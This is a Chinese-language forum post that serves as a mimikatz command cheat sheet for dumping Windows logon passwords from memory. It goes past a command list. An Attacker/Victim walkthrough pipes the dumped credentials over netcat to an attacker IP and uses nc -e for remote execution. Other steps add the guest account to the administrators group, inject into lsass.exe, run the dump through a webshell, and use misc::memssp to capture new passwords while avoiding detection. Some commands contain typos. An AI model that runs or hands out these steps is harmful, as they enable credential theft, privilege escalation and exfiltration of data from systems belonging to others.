mimikatz

The Ghost Atrox · 发表于 2019-11-1 15:13:41

href:http://www.ddooo.com/softdown/133908.htm
privilege::dubug #权限提升
sekurlsa::logonPasswords #必须要有管理员权限net localgroup administrators guest /add
sekurlsa::guest

一、常规的操作使用命令1、mimikatz # cls -->清屏,类似dos命令cls
2、mimikatz # exit -->退出mimikatz
3、mimikatz #version -->查看当前的mimikatz的版本
二、系统方面的操作使用命令:system
1、mimikatz #system::user -->查看当前登录的系统用户
2、mimikazt #system::computer -->返回当前的计算机名称
三、在服务器终端的操作命令: ts
1、mimikatz #ts::sessions -->显示当前的会话
2、mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等
四、系统服务相关的操作使用命令:service
五、系统进程相关操作的使用命令:process
六、系统线程相关操作使用命令:thread
七、系统句柄相关操作使用命令:handle
八、加密相关操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基础命令
1、cls清屏
2、exit退出
3、version查看mimikatz的版本
4、help查看帮助信息
5、system::user查看当前登录的系统用户
6、system::computer查看计算机名称
7、process::list列出进程
8、process::suspend进程名称-暂停进程
9、process::stop进程名称-结束进程
10、process::modules列出系统的核心模块及所在位置
11、service::list列出系统的服务
12、service::remove移除系统的服务
13、service::start stop服务名称-启动或停止服务
14、privilege::list列出权限列表
15、privilege::enable激活一个或多个权限
16、privilege::debug提升权限
17、nogpo::cmd打开系统的cmd.exe
18、nogpo::regedit打开系统的注册表
19、nogpo::taskmgr打开任务管理器
20、ts::sessions显示当前的会话
21、ts::processes显示进程和对应的pid情况等
22、sekurlsa::wdigest获取本地用户信息及密码
23、sekurlsa::wdigest获取kerberos用户信息及密码
24、sekurlsa::tspkg获取tspkg用户信息及密码
25、sekurlsa::logonPasswords获登陆用户信息及密码

进阶：

1.记录 Mimikatz输出：

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件：

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器：
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444

192.168.52.1 为Attacker IP

4.通过nc远程执行Mimikatz：
Victim执行:

C:\>nc -lvp 443

Attacker执行:

E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 为Victim IP

若管理员有每过几天就改密码的习惯，但是mimikatz抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash，新密码却抓不到的情况下

可以使用以下方法尝试解决

privilege::debug
misc::memssp

记录的结果在c:\windows\system32\mimilsa.log
每次验证都会记录如锁屏等重启失效

出现如上问题是因为管理一直没注销过，都是直接断开连接，lsass进程里面还吃存放的老的。

也可以直接logoff，但是这样会很明显。

文件
mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)

本机终端
绝对路径\mimikatz.exe

privilege::debuginject::process lsass.exe "绝对路径\sekurlsa.dll"@getLogonPasswordsexit

webshell
绝对路径\mimikatz.exe < 绝对路径\c.txt > 绝对路径\userpass.txt
———-c.txt———-

privilege::debuginject::process lsass.exe "绝对路径\sekurlsa.dll"@getLogonPasswordsexit

————————-

远程终端
psexec.exe -s cmd.exe
绝对路径\mimikatz.exe

privilege::debuginject::process lsass.exe "绝对路径\sekurlsa.dll"@getLogonPasswordsexit

		自动登录	找回密码
密码			立即注册